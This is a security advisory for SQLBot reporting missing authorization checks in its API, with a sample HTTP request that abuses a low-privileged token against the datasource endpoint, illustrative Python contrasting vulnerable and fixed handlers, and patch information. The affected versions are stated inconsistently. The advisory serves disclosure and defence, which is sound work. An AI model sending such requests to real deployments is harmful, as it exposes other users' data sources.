Impact
SQLBot versions 1.3.0 and earlier contained multiple authorization vulnerabilities in the API, allowing any authenticated user to perform create, read, update, and delete operations on all resources within SQLBot.
POC
- Deploy SQLBot application
- Login as a low-privileged user and obtain a valid x-sqlbot-token
Take the data source-related API interfaces as an example.
Check Datasource Connection (POST /datasource/check)
POST /api/v1/datasource/check HTTP/1.1
Host: target-server
Content-Type: application/json
x-sqlbot-token: <valid_user_token>
{
"id": 1,
"name": "test",
"type": "postgresql",
"host": "localhost",
"port": 5432,
"database": "test",
"username": "admin",
"password": "password"
}
Result: Checks datasource connection without authorization check.
Affected versions: < 1.5.0
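The following is an added illustration, not SQLBot's own code, of the class of gap the POC above exercises: a handler that only authenticates the session token (any logged-in user can act on any datasource id) beside one that also authorizes the caller against the specific resource, plus a small audit helper that applies the same rule to recorded (user, datasource) access pairs so an operator of an unpatched instance can spot cross-user access retrospectively. Everything here is constructed for the example: the in-memory session store, user and datasource records, and the function names are hypothetical and do not describe SQLBot's actual implementation.

```python
from dataclasses import dataclass


@dataclass
class User:
    id: int
    name: str
    is_admin: bool = False


@dataclass
class Datasource:
    id: int
    owner_id: int
    name: str


class AuthorizationError(Exception):
    """Raised when a request is not authenticated or not authorized."""


# Constructed sample state (hypothetical): two sessions and one datasource
# owned by the admin user. A real service would read these from its database.
SESSIONS = {
    "token-admin": User(id=1, name="admin", is_admin=True),
    "token-lowpriv": User(id=2, name="lowpriv"),
}
USERS_BY_ID = {u.id: u for u in SESSIONS.values()}
DATASOURCES = {1: Datasource(id=1, owner_id=1, name="test")}


def authenticate(token: str) -> User:
    """Map an x-sqlbot-token value to a user; unknown tokens are rejected."""
    user = SESSIONS.get(token)
    if user is None:
        raise AuthorizationError("invalid or missing x-sqlbot-token")
    return user


def authorize_datasource(user: User, ds_id: int) -> Datasource:
    """Per-resource check: the caller must own the datasource or be an admin.
    Unknown ids get the same error so callers cannot enumerate valid ids."""
    ds = DATASOURCES.get(ds_id)
    if ds is None or (ds.owner_id != user.id and not user.is_admin):
        raise AuthorizationError(f"user {user.id} may not access datasource {ds_id}")
    return ds


def check_datasource_vulnerable(token: str, body: dict) -> str:
    """Pre-fix shape: authentication only. Any valid session may act on
    any datasource id, which is the gap the advisory describes."""
    authenticate(token)
    ds = DATASOURCES[body["id"]]
    return f"checked datasource {ds.id}"


def check_datasource_fixed(token: str, body: dict) -> str:
    """Post-fix shape: authenticate, then authorize the specific resource."""
    user = authenticate(token)
    ds = authorize_datasource(user, body["id"])
    return f"checked datasource {ds.id}"


def outcome(handler, token: str, body: dict) -> str:
    """Run a handler and fold its result into 'ok' or 'denied'."""
    try:
        handler(token, body)
        return "ok"
    except AuthorizationError:
        return "denied"


def find_unauthorized_accesses(events: list) -> list:
    """Retrospective audit for an unpatched instance: given (user_id,
    datasource_id) pairs taken from access logs, return the pairs that the
    fixed authorization rule would have denied."""
    flagged = []
    for user_id, ds_id in events:
        user = USERS_BY_ID.get(user_id)
        try:
            if user is None:
                raise AuthorizationError("unknown user")
            authorize_datasource(user, ds_id)
        except AuthorizationError:
            flagged.append((user_id, ds_id))
    return flagged


if __name__ == "__main__":
    body = {"id": 1, "name": "test", "type": "postgresql"}
    print("vulnerable, low-priv:", outcome(check_datasource_vulnerable, "token-lowpriv", body))
    print("fixed, low-priv:     ", outcome(check_datasource_fixed, "token-lowpriv", body))
    print("fixed, admin:        ", outcome(check_datasource_fixed, "token-admin", body))
    print("audit:", find_unauthorized_accesses([(1, 1), (2, 1), (2, 99)]))
```

The design point is that authentication (is the token valid?) and authorization (may this user touch this resource?) are separate checks; the advisory's root cause is the second one being absent, so the fix lives in a per-resource dependency that every datasource handler calls, not in the token parser. Returning the same error for unknown and foreign ids keeps the endpoint from doubling as an id oracle.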
Justification for Single CVE Assignment
According to CVE CNA Rule 4.2.11 (Independently Fixable Vulnerabilities), this advisory requests a single CVE ID because the listed vulnerabilities are NOT independently fixable, for the following reasons:
- Shared Root Cause: All vulnerabilities stem from the same core design flaw — specifically, the lack of input validation and session token verification. Fixing one vulnerability requires addressing the root cause, which inherently resolves all other listed vulnerabilities.
- Unified Fix Implementation: The only viable fix for these vulnerabilities is a single code change — there is no way to fix one vulnerability without simultaneously fixing all others.
- Dependent Impact: The exploitation of one vulnerability is a prerequisite for exploiting the other — they do not represent separate, isolated security risks to end users.
Patches
The vulnerability has been fixed in v1.5.0.
Workarounds
It is recommended to upgrade the version to v1.5.0.
References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/dataease/sqlbot
Email us at wei@fit2cloud.com